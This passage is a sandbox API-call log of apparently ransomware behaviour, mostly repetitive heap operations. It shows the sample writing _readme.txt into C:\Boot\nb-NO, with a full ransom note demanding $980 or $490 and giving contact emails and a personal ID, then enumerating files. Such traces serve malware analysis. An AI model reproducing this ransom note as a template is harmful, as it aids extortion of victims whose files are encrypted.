hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.632] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0228.632] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.632] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.632] PathFindFileNameW (pszPath="") returned="" [0228.632] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.632] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.632] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.633] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.633] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0228.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.633] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0228.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.633] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.633] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.633] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.634] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.634] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.634] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.634] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.634] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.634] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] 